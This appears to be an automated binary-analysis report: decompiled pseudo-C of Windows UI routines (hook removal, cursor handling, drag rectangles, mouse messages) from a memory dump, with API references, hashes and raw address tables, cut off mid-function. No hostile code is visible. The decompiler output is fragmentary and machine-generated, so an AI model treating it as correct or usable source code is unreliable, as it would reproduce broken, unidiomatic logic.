                                                                        				 *0x496c1c = 0;
                                                                        				if( *0x496c20 != 0) {
                                                                        					_t2 =  *0x496c18; // 0x0
                                                                        					SetEvent(_t2);
                                                                        					if(GetCurrentThreadId() !=  *0x496c14) {
                                                                        						_t8 =  *0x496c20; // 0x0
                                                                        						WaitForSingleObject(_t8, 0xffffffff);
                                                                        					}
                                                                        					_t5 =  *0x496c20; // 0x0
                                                                        					CloseHandle(_t5);
                                                                        					 *0x496c20 = 0;
                                                                        					return 0;
                                                                        				}
                                                                        				return 0;
                                                                        			}








                                                                        APIs
                                                                        • UnhookWindowsHookEx.USER32(00000000), ref: 00454F77
                                                                        • SetEvent.KERNEL32(00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454F92
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00454F97
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FAC
                                                                        • CloseHandle.KERNEL32(00000000,00000000,00457212,00000000,004562EF,?,?,004798C4,00000001,004563AF,?,?,?,004798C4), ref: 00454FB7
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: CloseCurrentEventHandleHookObjectSingleThreadUnhookWaitWindows
                                                                        • String ID:
                                                                        • API String ID: 2429646606-0
                                                                        • Opcode ID: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction ID: 98b08e2d4b11bd526172336b730c09841e2ca8282cf2238b0d719a92ae855655
                                                                        • Opcode Fuzzy Hash: f342eaf5d6d82dadfeef3d3fe6df92537fcd3f42866fbe39511197cf40211446
                                                                        • Instruction Fuzzy Hash: C1F01C716041009AC710FBBDDD85E1536E4E718349B03493BB581E71A5CB3DD480CF1C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 86%
                                                                        			E004573E0(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                        				char _v8;
                                                                        				int _v12;
                                                                        				char _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				struct tagPOINT _v32;
                                                                        				char _v33;
                                                                        				intOrPtr _v40;
                                                                        				char _v44;
                                                                        				intOrPtr _v48;
                                                                        				struct HWND__* _v52;
                                                                        				intOrPtr _v56;
                                                                        				char _v60;
                                                                        				struct tagRECT _v76;
                                                                        				intOrPtr _v80;
                                                                        				intOrPtr _v84;
                                                                        				int _v88;
                                                                        				int _v92;
                                                                        				intOrPtr _v96;
                                                                        				char _v100;
                                                                        				struct tagRECT _v116;
                                                                        				char _v132;
                                                                        				intOrPtr _v136;
                                                                        				char _v140;
                                                                        				char _v144;
                                                                        				char _v148;
                                                                        				struct HWND__* _t135;
                                                                        				struct HWND__* _t171;
                                                                        				intOrPtr _t193;
                                                                        				char _t199;
                                                                        				intOrPtr _t223;
                                                                        				intOrPtr _t227;
                                                                        				intOrPtr* _t262;
                                                                        				intOrPtr _t281;
                                                                        				intOrPtr _t282;
                                                                        				intOrPtr _t284;
                                                                        				intOrPtr _t290;
                                                                        				intOrPtr* _t319;
                                                                        				intOrPtr _t320;
                                                                        				void* _t327;
                                                                        
                                                                        				_t326 = _t327;
                                                                        				_v144 = 0;
                                                                        				_v148 = 0;
                                                                        				asm("movsd");
                                                                        				asm("movsd");
                                                                        				_v8 = __eax;
                                                                        				_t281 =  *0x44d464; // 0x44d468
                                                                        				E00404D24( &_v100, _t281);
                                                                        				_t262 =  &_v8;
                                                                        				_push(_t327);
                                                                        				_push(0x45778b);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t327 + 0xffffff70;
                                                                        				 *((char*)( *_t262 + 0x58)) = 0;
                                                                        				if( *((char*)( *_t262 + 0x88)) == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0 || E0044D81C() == 0 || E00454DE0(E00434E58( &_v16, 1)) !=  *((intOrPtr*)( *_t262 + 0x60))) {
                                                                        					L23:
                                                                        					_t135 = _v52;
                                                                        					__eflags = _t135;
                                                                        					if(_t135 <= 0) {
                                                                        						E004571F4( *_t262);
                                                                        					} else {
                                                                        						E00456FFC( *_t262, 0, _t135);
                                                                        					}
                                                                        					goto L26;
                                                                        				} else {
                                                                        					_v100 =  *((intOrPtr*)( *_t262 + 0x60));
                                                                        					_v92 = _v16;
                                                                        					_v88 = _v12;
                                                                        					_v88 = _v88 + E0045722C();
                                                                        					_v84 = E004541A4();
                                                                        					_v80 =  *((intOrPtr*)( *_t262 + 0x5c));
                                                                        					E00435F4C( *((intOrPtr*)( *_t262 + 0x60)),  &_v132);
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					asm("movsd");
                                                                        					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)))) + 0x40))();
                                                                        					_v32.x = 0;
                                                                        					_v32.y = 0;
                                                                        					_t319 =  *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x60)) + 0x30));
                                                                        					_t333 = _t319;
                                                                        					if(_t319 == 0) {
                                                                        						_t320 =  *((intOrPtr*)( *_t262 + 0x60));
                                                                        						_t290 =  *0x4323f0; // 0x43243c
                                                                        						_t171 = E00403768(_t320, _t290);
                                                                        						__eflags = _t171;
                                                                        						if(_t171 != 0) {
                                                                        							__eflags =  *(_t320 + 0x190);
                                                                        							if( *(_t320 + 0x190) != 0) {
                                                                        								ClientToScreen( *(_t320 + 0x190),  &_v32);
                                                                        							}
                                                                        						}
                                                                        					} else {
                                                                        						 *((intOrPtr*)( *_t319 + 0x40))();
                                                                        					}
                                                                        					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
                                                                        					E004360F0( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v16);
                                                                        					_v60 = _v140;
                                                                        					_v56 = _v136;
                                                                        					E00454DA8( *((intOrPtr*)( *_t262 + 0x60)),  &_v148);
                                                                        					E004336E0(_v148,  &_v140,  &_v144, _t333);
                                                                        					E004043E0( &_v44, _v144);
                                                                        					_v52 = 0;
                                                                        					_v48 =  *((intOrPtr*)( *_t262 + 0x74));
                                                                        					_t193 =  *0x47aaf0; // 0x432a84
                                                                        					_v96 = _t193;
                                                                        					_v40 = 0;
                                                                        					_v33 = E00437760( *((intOrPtr*)( *_t262 + 0x60)), 0, 0xb030,  &_v100) == 0;
                                                                        					if(_v33 != 0 &&  *((short*)( *_t262 + 0x11a)) != 0) {
                                                                        						 *((intOrPtr*)( *_t262 + 0x118))( &_v100);
                                                                        					}
                                                                        					if(_v33 == 0 ||  *((intOrPtr*)( *_t262 + 0x60)) == 0) {
                                                                        						_t199 = 0;
                                                                        					} else {
                                                                        						_t199 = 1;
                                                                        					}
                                                                        					_t296 =  *_t262;
                                                                        					 *((char*)( *_t262 + 0x58)) = _t199;
                                                                        					if( *((char*)( *_t262 + 0x58)) == 0) {
                                                                        						goto L23;
                                                                        					} else {
                                                                        						_t340 = _v44;
                                                                        						if(_v44 == 0) {
                                                                        							goto L23;
                                                                        						}
                                                                        						E00457380(_v96, _t296, _t326);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0x70))();
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd4))( &_v116, _v40);
                                                                        						OffsetRect( &_v116, _v92, _v88);
                                                                        						if(E004037D8( *((intOrPtr*)( *_t262 + 0x84)), _t340) != 0) {
                                                                        							_v116.left = _v116.left - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
                                                                        							_v116.right = _v116.right - E0042056C( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)) + 0x208)), _v44) + 5;
                                                                        						}
                                                                        						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &_v76);
                                                                        						_t223 =  *_t262;
                                                                        						 *((intOrPtr*)(_t223 + 0x64)) = _v140;
                                                                        						 *((intOrPtr*)(_t223 + 0x68)) = _v136;
                                                                        						E004360C4( *((intOrPtr*)( *_t262 + 0x60)),  &_v140,  &(_v76.right));
                                                                        						_t227 =  *_t262;
                                                                        						 *((intOrPtr*)(_t227 + 0x6c)) = _v140;
                                                                        						 *((intOrPtr*)(_t227 + 0x70)) = _v136;
                                                                        						E0043674C( *((intOrPtr*)( *_t262 + 0x84)), _v80);
                                                                        						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t262 + 0x84)))) + 0xd0))(_v40);
                                                                        						E00454EF4(_v44);
                                                                        						_t236 = _v52;
                                                                        						if(_v52 <= 0) {
                                                                        							E00456FFC( *_t262, 1, _v48);
                                                                        						} else {
                                                                        							E00456FFC( *_t262, 0, _t236);
                                                                        						}
                                                                        						L26:
                                                                        						_pop(_t282);
                                                                        						 *[fs:eax] = _t282;
                                                                        						_push(0x457792);
                                                                        						E0040436C( &_v148, 2);
                                                                        						_t284 =  *0x44d464; // 0x44d468
                                                                        						return E00404DF4( &_v100, _t284);
                                                                        					}
                                                                        				}
                                                                        			}












































                                                                        APIs
                                                                          • Part of subcall function 0044D81C: GetActiveWindow.USER32 ref: 0044D81F
                                                                          • Part of subcall function 0044D81C: GetCurrentThreadId.KERNEL32 ref: 0044D834
                                                                          • Part of subcall function 0044D81C: 72E7AC10.USER32(00000000,0044D7FC), ref: 0044D83A
                                                                          • Part of subcall function 0045722C: GetCursor.USER32(?), ref: 00457247
                                                                          • Part of subcall function 0045722C: GetIconInfo.USER32(00000000,?), ref: 0045724D
                                                                        • ClientToScreen.USER32(?,?), ref: 0045750C
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457523
                                                                        • OffsetRect.USER32(?,?,?), ref: 00457653
                                                                          • Part of subcall function 00456FFC: SetTimer.USER32(00000000,00000000,?,00454E00), ref: 00457016
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
                                                                        • String ID: <$C
                                                                        • API String ID: 3022406661-3423417450
                                                                        • Opcode ID: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction ID: 30bf7d25c4205cc9a04f9c4c997c4720ffd439aca70f5178930e4931d0ecf433
                                                                        • Opcode Fuzzy Hash: 00bf1ddf5426e94dbb9774d478e7e55c612c9b43fdf6370cf5323fbe8e4eb597
                                                                        • Instruction Fuzzy Hash: C9D1F575A00618CFCB00DFA8D884A9EB7F5BF49304F1580AAE904EB366DB34AD49CF55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 89%
                                                                        			E00440F1C(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi, void* __fp0) {
                                                                        				intOrPtr* _v8;
                                                                        				struct tagPOINT _v16;
                                                                        				char _v20;
                                                                        				intOrPtr _v24;
                                                                        				intOrPtr _v28;
                                                                        				intOrPtr _v32;
                                                                        				char _v36;
                                                                        				struct tagMSG _v64;
                                                                        				intOrPtr _v68;
                                                                        				long _v72;
                                                                        				char _v76;
                                                                        				intOrPtr _t125;
                                                                        				int _t126;
                                                                        				int _t140;
                                                                        				int _t147;
                                                                        				intOrPtr* _t175;
                                                                        				int _t186;
                                                                        				void* _t191;
                                                                        				intOrPtr* _t209;
                                                                        				void* _t213;
                                                                        				intOrPtr _t214;
                                                                        				intOrPtr _t219;
                                                                        				int _t232;
                                                                        				intOrPtr _t233;
                                                                        				int _t236;
                                                                        				intOrPtr* _t242;
                                                                        				intOrPtr _t262;
                                                                        				intOrPtr _t278;
                                                                        				intOrPtr _t289;
                                                                        				int _t297;
                                                                        				int _t300;
                                                                        				int _t302;
                                                                        				int _t303;
                                                                        				int _t304;
                                                                        				void* _t307;
                                                                        				void* _t309;
                                                                        				void* _t315;
                                                                        
                                                                        				_t315 = __fp0;
                                                                        				_t306 = _t307;
                                                                        				_push(__edi);
                                                                        				_v76 = 0;
                                                                        				_t242 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_push(_t307);
                                                                        				_push(0x4412f4);
                                                                        				_push( *[fs:eax]);
                                                                        				 *[fs:eax] = _t307 + 0xffffffb8;
                                                                        				_t125 =  *__edx;
                                                                        				_t309 = _t125 - 0x202;
                                                                        				if(_t309 > 0) {
                                                                        					_t126 = _t125 - 0x203;
                                                                        					__eflags = _t126;
                                                                        					if(__eflags == 0) {
                                                                        						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v72);
                                                                        						_t297 = E0043F9A8(_v8,  &_v20,  &_v72, __eflags);
                                                                        						__eflags = _t297;
                                                                        						if(_t297 != 0) {
                                                                        							__eflags =  *(_t297 + 4);
                                                                        							if( *(_t297 + 4) != 0) {
                                                                        								__eflags = _v20 - 2;
                                                                        								if(_v20 == 2) {
                                                                        									E00434E0C();
                                                                        									E004372AC( *(_t297 + 4), 0, 0, 1);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						L47:
                                                                        						if( *((short*)(_v8 + 0x32)) != 0) {
                                                                        							 *((intOrPtr*)(_v8 + 0x30))();
                                                                        						}
                                                                        						L49:
                                                                        						_pop(_t262);
                                                                        						 *[fs:eax] = _t262;
                                                                        						_push(0x4412fb);
                                                                        						return E00404348( &_v76);
                                                                        					}
                                                                        					_t140 = _t126 - 0xae2d;
                                                                        					__eflags = _t140;
                                                                        					if(_t140 == 0) {
                                                                        						 *((intOrPtr*)(_v8 + 0x30))();
                                                                        						__eflags =  *(__edx + 0xc);
                                                                        						if( *(__edx + 0xc) != 0) {
                                                                        							goto L49;
                                                                        						}
                                                                        						_t300 =  *((intOrPtr*)( *_v8 + 4))();
                                                                        						__eflags = _v20 - 0x12;
                                                                        						if(_v20 != 0x12) {
                                                                        							__eflags = _t300;
                                                                        							if(_t300 == 0) {
                                                                        								goto L49;
                                                                        							}
                                                                        							_t147 = _v20 - 2;
                                                                        							__eflags = _t147;
                                                                        							if(_t147 == 0) {
                                                                        								L46:
                                                                        								E00435F4C(_t300,  &_v36);
                                                                        								 *((intOrPtr*)( *_v8))();
                                                                        								_v36 = _v36 - _v36 -  *((intOrPtr*)(_t300 + 0x40)) + _v36 -  *((intOrPtr*)(_t300 + 0x40));
                                                                        								_v32 = _v32 - _v32 -  *((intOrPtr*)(_t300 + 0x44)) + _v32 -  *((intOrPtr*)(_t300 + 0x44));
                                                                        								_v28 = _v28 -  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36 +  *((intOrPtr*)(_t300 + 0x48)) - _v28 - _v36;
                                                                        								_v24 = _v24 -  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32 +  *((intOrPtr*)(_t300 + 0x4c)) - _v24 - _v32;
                                                                        								E004365AC(_t300,  &_v76);
                                                                        								E0040439C( *((intOrPtr*)(_t242 + 8)) + 0x38, _v76);
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								asm("movsd");
                                                                        								goto L49;
                                                                        							}
                                                                        							__eflags = _t147 != 0x12;
                                                                        							if(_t147 != 0x12) {
                                                                        								goto L49;
                                                                        							}
                                                                        							goto L46;
                                                                        						}
                                                                        						E00404348( *((intOrPtr*)(__edx + 8)) + 0x38);
                                                                        						goto L49;
                                                                        					} else {
                                                                        						__eflags = _t140 == 0x12;
                                                                        						if(_t140 == 0x12) {
                                                                        							_t175 =  *((intOrPtr*)(__edx + 8));
                                                                        							__eflags =  *_t175 - 0xb00b;
                                                                        							if( *_t175 == 0xb00b) {
                                                                        								E00440E00(_v8,  *((intOrPtr*)(_t175 + 4)),  *((intOrPtr*)(__edx + 4)), __edi);
                                                                        							}
                                                                        						}
                                                                        						goto L47;
                                                                        					}
                                                                        				}
                                                                        				if(_t309 == 0) {
                                                                        					__eflags =  *(_v8 + 0x60);
                                                                        					if(__eflags != 0) {
                                                                        						E0044094C(_v8, __eflags);
                                                                        					} else {
                                                                        						E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                        						_t302 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        						__eflags = _t302;
                                                                        						if(_t302 != 0) {
                                                                        							__eflags = _v20 - 0x14;
                                                                        							if(_v20 == 0x14) {
                                                                        								_t295 =  *((intOrPtr*)(_t302 + 4));
                                                                        								_t278 =  *0x44c130; // 0x44c17c
                                                                        								_t186 = E00403768( *((intOrPtr*)(_t302 + 4)), _t278);
                                                                        								__eflags = _t186;
                                                                        								if(_t186 == 0) {
                                                                        									E004364CC(_t295, 0);
                                                                        								} else {
                                                                        									E00453004(_t295,  &_v20);
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        					goto L47;
                                                                        				}
                                                                        				_t191 = _t125 - 0x20;
                                                                        				if(_t191 == 0) {
                                                                        					GetCursorPos( &_v16);
                                                                        					E004360F0( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
                                                                        					_v16.x = _v72;
                                                                        					_v16.y = _v68;
                                                                        					__eflags =  *((short*)(_t242 + 8)) - 1;
                                                                        					if( *((short*)(_t242 + 8)) != 1) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = E0043CC2C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
                                                                        					if(__eflags != 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = E0043B7C0( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
                                                                        					if(__eflags <= 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					_t303 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        					__eflags = _t303;
                                                                        					if(_t303 == 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = _v20 - 0x12;
                                                                        					if(_v20 != 0x12) {
                                                                        						goto L47;
                                                                        					}
                                                                        					_t209 =  *0x495c2c; // 0x496c08
                                                                        					SetCursor(E0045469C( *_t209,  *((short*)(0x47a9d0 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
                                                                        					 *((intOrPtr*)(_t242 + 0xc)) = 1;
                                                                        					goto L49;
                                                                        				}
                                                                        				_t213 = _t191 - 0x1e0;
                                                                        				if(_t213 == 0) {
                                                                        					_t214 = _v8;
                                                                        					__eflags =  *(_t214 + 0x60);
                                                                        					if( *(_t214 + 0x60) != 0) {
                                                                        						E00440A00(_v8);
                                                                        						E00407314( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
                                                                        						_t219 = _v8;
                                                                        						 *(_t219 + 0x50) = _v72;
                                                                        						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
                                                                        						E00440E88(_t306);
                                                                        						E00440A00(_v8);
                                                                        					}
                                                                        					goto L47;
                                                                        				}
                                                                        				if(_t213 == 1) {
                                                                        					E00407314( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
                                                                        					_t256 =  &_v20;
                                                                        					_t304 = E0043F9A8(_v8,  &_v20,  &_v16, __eflags);
                                                                        					__eflags = _t304;
                                                                        					if(_t304 == 0) {
                                                                        						goto L47;
                                                                        					}
                                                                        					__eflags = _v20 - 0x12;
                                                                        					if(__eflags != 0) {
                                                                        						__eflags = _v20 - 2;
                                                                        						if(_v20 != 2) {
                                                                        							goto L47;
                                                                        						}
                                                                        						_t232 = PeekMessageA( &_v64, E0043CC2C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
                                                                        						__eflags = _t232;
                                                                        						if(_t232 == 0) {
                                                                        							_t289 =  *0x4323f0; // 0x43243c
                                                                        							_t236 = E00403768( *((intOrPtr*)(_t304 + 4)), _t289);
                                                                        							__eflags = _t236;
                                                                        							if(_t236 != 0) {
                                                                        								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc0))();
                                                                        							}
                                                                        						}
                                                                        						_t233 =  *((intOrPtr*)(_t304 + 4));
                                                                        						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
                                                                        						if( *((char*)(_t233 + 0x9b)) == 1) {
                                                                        							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
                                                                        							if( *((char*)(_t233 + 0x5d)) == 1) {
                                                                        								E00436C54(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
                                                                        							}
                                                                        						}
                                                                        						goto L49;
                                                                        					}
                                                                        					E004408EC(_v8,  &_v16, _t304, __eflags);
                                                                        				} else {
                                                                        				}
                                                                        			}
                                                                        0x00440f7a
                                                                        0x00440f7d
                                                                        0x00440f83
                                                                        0x00440f86
                                                                        0x00440f8c
                                                                        0x00440f9b
                                                                        0x00440f9b
                                                                        0x00440f8c
                                                                        0x00000000
                                                                        0x00440f7d
                                                                        0x00440f74
                                                                        0x00440f46
                                                                        0x004410ea
                                                                        0x004410ee
                                                                        0x0044114e
                                                                        0x004410f0
                                                                        0x004410f6
                                                                        0x00441109
                                                                        0x0044110b
                                                                        0x0044110d
                                                                        0x00441113
                                                                        0x00441117
                                                                        0x0044111d
                                                                        0x00441122
                                                                        0x00441128
                                                                        0x0044112d
                                                                        0x0044112f
                                                                        0x00441141
                                                                        0x00441131
                                                                        0x00441133
                                                                        0x00441133
                                                                        0x0044112f
                                                                        0x00441117
                                                                        0x0044110d
                                                                        0x00000000
                                                                        0x004410ee
                                                                        0x00440f4c
                                                                        0x00440f4f
                                                                        0x0044115c
                                                                        0x0044116d
                                                                        0x00441175
                                                                        0x0044117b
                                                                        0x0044117e
                                                                        0x00441183
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441194
                                                                        0x00441197
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411a8
                                                                        0x004411aa
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411be
                                                                        0x004411c0
                                                                        0x004411c2
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411c8
                                                                        0x004411cc
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x004411e1
                                                                        0x004411ee
                                                                        0x004411f3
                                                                        0x00000000
                                                                        0x004411f3
                                                                        0x00440f55
                                                                        0x00440f5a
                                                                        0x00440fa5
                                                                        0x00440fa8
                                                                        0x00440fac
                                                                        0x00440fb5
                                                                        0x00440fc0
                                                                        0x00440fc5
                                                                        0x00440fcb
                                                                        0x00440fd1
                                                                        0x00440fd5
                                                                        0x00440fde
                                                                        0x00440fde
                                                                        0x00000000
                                                                        0x00440fac
                                                                        0x00440f5d
                                                                        0x0044103d
                                                                        0x00441042
                                                                        0x00441050
                                                                        0x00441052
                                                                        0x00441054
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x0044105a
                                                                        0x0044105e
                                                                        0x00441072
                                                                        0x00441076
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00441098
                                                                        0x0044109d
                                                                        0x0044109f
                                                                        0x004410a4
                                                                        0x004410aa
                                                                        0x004410af
                                                                        0x004410b1
                                                                        0x004410b8
                                                                        0x004410b8
                                                                        0x004410b1
                                                                        0x004410be
                                                                        0x004410c1
                                                                        0x004410c8
                                                                        0x004410ce
                                                                        0x004410d2
                                                                        0x004410dd
                                                                        0x004410dd
                                                                        0x004410d2
                                                                        0x00000000
                                                                        0x004410c8
                                                                        0x00441068
                                                                        0x00000000
                                                                        0x00440f63

                                                                        APIs
                                                                        • GetCursorPos.USER32(?), ref: 0044115C
                                                                        • SetCursor.USER32(00000000,?,00000000,004412F4), ref: 004411EE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.655630059.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.655625463.0000000000400000.00000002.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655688093.000000000047A000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655691873.000000000047B000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655697954.0000000000495000.00000008.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655701560.0000000000496000.00000004.00020000.sdmp
                                                                        • Associated: 00000000.00000002.655708916.000000000049C000.00000002.00020000.sdmp
                                                                        Similarity
                                                                        • API ID: Cursor
                                                                        • String ID: <$C
                                                                        • API String ID: 3268636600-3423417450
                                                                        • Opcode ID: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction ID: 53dfb2be38ad3f3824fe0bc66c4258adf9aa410c39980d357e277dc970e496b8
                                                                        • Opcode Fuzzy Hash: 179ed4ee4d19abd0baf6d6ed879b91dc92126d894a0e04a2a6289e9d6702bce5
                                                                        • Instruction Fuzzy Hash: 81C15E34A00219DFDB10DFA9C585A9EB3F1BF44304F1485A6E900EB365D778EE85CB49
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 95%
                                                                        			E0045FE24(intOrPtr* __eax, signed int __ecx, signed int __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                        				intOrPtr* _v8;
                                                                        				signed int _v9;
                                                                        				signed int _v16;
                                                                        				signed int _v20;
                                                                        				char _v21;
                                                                        				char _v124;
                                                                        				char _v132;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t145;
                                                                        				intOrPtr _t169;
                                                                        				intOrPtr _t171;
                                                                        				intOrPtr _t172;
                                                                        				intOrPtr _t173;
                                                                        				signed int _t177;
                                                                        				signed int _t184;
                                                                        				intOrPtr _t193;
                                                                        				signed int _t197;
                                                                        				signed int _t204;
                                                                        				intOrPtr _t213;
                                                                        				intOrPtr _t215;
                                                                        				signed int _t224;
                                                                        				signed int _t237;
                                                                        				signed int _t240;
                                                                        				void* _t248;
                                                                        				void* _t252;
                                                                        				signed int _t253;
                                                                        				intOrPtr _t268;
                                                                        				intOrPtr _t284;
                                                                        				void* _t295;
                                                                        				signed int _t297;
                                                                        				intOrPtr _t304;
                                                                        
                                                                        				_v9 = __ecx;
                                                                        				_t253 = __edx;
                                                                        				_v8 = __eax;
                                                                        				_t294 = _a8;
                                                                        				_v21 = 0;
                                                                        				E00460CD8(_v8, __edx, _a8, _t295);
                                                                        				_t145 = _v8;
                                                                        				_t305 =  *(_t145 + 0x1c) & 0x00000010;
                                                                        				if(( *(_t145 + 0x1c) & 0x00000010) != 0) {
                                                                        					L5:
                                                                        					__eflags = _t253;
                                                                        					if(_t253 != 0) {
                                                                        						L8:
                                                                        						__eflags = _t253;
                                                                        						if(_t253 != 0) {
                                                                        							L37:
                                                                        							_push(0x4601cf);
                                                                        							_push( *[fs:eax]);
                                                                        							 *[fs:eax] = _t304;
                                                                        							E00437B78(_v8, _t253, _a4, _t294);
                                                                        							_pop(_t268);
                                                                        							 *[fs:eax] = _t268;
                                                                        							return 0;
                                                                        						}
                                                                        						E0045D74C(_v8,  &_v124);
                                                                        						_t296 =  *_v8;
                                                                        						 *((intOrPtr*)( *_v8 + 0xc8))( &_v124, _v8 + 0x268, _v8 + 0x264, _v8 + 0x260, _v8 + 0x28e);
                                                                        						__eflags =  *((char*)(_v8 + 0x28e));
                                                                        						if(__eflags != 0) {
                                                                        							__eflags =  *((char*)(_v8 + 0x28e)) - 3;
                                                                        							if(__eflags == 0) {
                                                                        								_t296 = 0xffc8;
                                                                        								_t237 = E004037D8(_v8, __eflags);
                                                                        								__eflags = _t237;
                                                                        								if(_t237 != 0) {
                                                                        									_t240 = E00435FB0(_v8) -  *(_v8 + 0x264);
                                                                        									__eflags = _t240;
                                                                        									 *(_v8 + 0x264) = _t240;
                                                                        								}
                                                                        							}
                                                                        							return E0045E140(_v8, _t253,  &_v124, _t294, _t296);
                                                                        						}
                                                                        						_t259 = _a4;
                                                                        						E0045D6F0(_v8, _a4, _t294, __eflags,  &_v20,  &_v124);
                                                                        						_t169 = _v8;
                                                                        						_t297 = _v20;
                                                                        						__eflags =  *((intOrPtr*)(_t169 + 0x238)) - _t297;
                                                                        						if( *((intOrPtr*)(_t169 + 0x238)) > _t297) {
                                                                        							L25:
                                                                        							_t171 = _v8;
                                                                        							__eflags =  *(_t171 + 0x249) & 0x00000001;
                                                                        							if(( *(_t171 + 0x249) & 0x00000001) == 0) {
                                                                        								L31:
                                                                        								_t172 = _v8;
